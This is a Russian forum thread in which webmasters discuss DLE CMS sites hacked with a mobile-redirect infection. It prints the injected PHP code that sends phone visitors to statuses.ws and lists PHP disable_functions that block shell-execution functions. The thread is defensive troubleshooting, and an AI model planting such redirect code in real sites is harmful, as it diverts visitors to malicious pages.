Вирус на сайте cms dle

gpomov
На сайте с 05.01.2010
Offline
34
#91
ProLiant:
Сколько двигов - столько и уязвимостей... Остается надеяться на оперативное закрытие этих дыр разработчиками.

Разработчики больше волнуются чуть ли не за квартальное обновлений версии, чем за оперативное закрытие всех дыр в движке.

S
На сайте с 10.09.2011
Offline
75
#92

Изменяю пароль главного администратора на сайте, и после перехода в админку вижу сообщение:

Хотя жалоб никто не отправлял, еще кто-то замечал подобное на своих сайтах?

......
K5
На сайте с 21.07.2010
Offline
209
#93
serforall:
Изменяю пароль главного администратора на сайте, и после перехода в админку вижу сообщение:


Хотя жалоб никто не отправлял, еще кто-то замечал подобное на своих сайтах?

нет, видимо тебе пока больше всего достается

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
S
На сайте с 10.09.2011
Offline
75
#94
kgtu5:
нет, видимо тебе пока больше всего достается

у вас на своих сайтах удалось избавиться от этой гадости? 😒 если да, то каким способом?

S
На сайте с 23.08.2011
Offline
80
#95
serforall:
у вас на своих сайтах удалось избавиться от этой гадости? 😒 если да, то каким способом?

смена паролей(фтп и бд) + установка патчей. Помогло или нет, будет ясно через пару дней-неделю

serforall у вас после взлома такой код появляется?

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: http://statuses.ws/');

K5
На сайте с 21.07.2010
Offline
209
#96
serforall:
у вас на своих сайтах удалось избавиться от этой гадости? 😒 если да, то каким способом?

Пока не было ни разу (другие обращаются с этой проблемой), сидю и жду когда ко мне придут, дле9.5+патчи...

!!! вопрос ко всем !!! Из phpinfo покажите disable_functions.

D
На сайте с 31.07.2006
Offline
70
#97

ещё малость на раздумия.. Смену пароля фтп я не делал (так как личный дедик и доступ лишь с моего айпи возможен (через фаерволл на сервере) доступ к всем панелькам управления тоже лишь разрешен через мой айп.. Правда такой вредоносный код у меня был в .htaccess, почистил снял лишние модули и уже пару месяцев полет нормальный :)

зы. лицуха

mutnyi
На сайте с 14.02.2010
Offline
22
#98
Кстати вот профиль возможного вредителя

С чего это вдруг?

statuses.ws

сайт в подписи

Вот ответ хостера...

я (11:54:56 16/01/2013)
Добрый день

Support Максим (11:56:11 16/01/2013)
Здравствуйте

я (11:56:17 16/01/2013)
Подскажите у вас на 46.165.197.69 расположен домен statuses.ws?

Support Максим (11:56:54 16/01/2013)
нет

я (11:57:00 16/01/2013)
Спрашиваю про него так как он не чист на руку


Support Максим (11:57:02 16/01/2013)
он был удален и заблокирован для размещения

Support Максим (11:57:12 16/01/2013)
мы в курсе, по этому и заблокирован был

Support Максим (11:57:36 16/01/2013)
93.114.46.180 его IP адрес

Support Максим (11:57:40 16/01/2013)
его сервера

Support Максим (11:57:49 16/01/2013)
абузы не помогут

Support Максим (11:57:55 16/01/2013)
мы уже сами отправляли

я (11:58:25 16/01/2013)
Понял. задолбали они со своими шелами

Support Максим (11:58:49 16/01/2013)
и не говорите
Новинки 2013 (http://mrix.ru)
S
На сайте с 10.09.2011
Offline
75
#99
mutnyi:
С чего это вдруг?

statuses.ws


Вот ответ хостера...

Сайт statuses.ws и сайт у вас в подписи находились на одном ip, что очень странно... http://www.cy-pr.com/ip/46.165.197.69

kgtu5:


!!! вопрос ко всем !!! Из phpinfo покажите disable_functions.

disable_functions: dl, exec, passthru, pcntl_exec, pfsockopen, popen, posix_kill, posix_mkfifo, posix_setuid, proc_close, proc_open, proc_terminate, shell_exec, system, ftp_exec, leak, posix_setpgid, posix_setsid, proc_get_status, proc_nice, show_source, escapeshellcmd

stingman:
смена паролей(фтп и бд) + установка патчей. Помогло или нет, будет ясно через пару дней-неделю

serforall у вас после взлома такой код появляется?

Да 😡

predator-hoi
На сайте с 16.07.2009
Offline
181
#100

А у меня сейчас новая зараза, сайт андроид тематики, при скачке рандомно подгружает зараженный мидлет. То есть бывает и норм файл скачивается, а бывает мидлет.

$$$ Автоматические инструменты для ведения групп в сети «Одноклассники», «ВКонтакте» и «Telegram» ( https://bit.ly/3jyvDiH) $$$

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий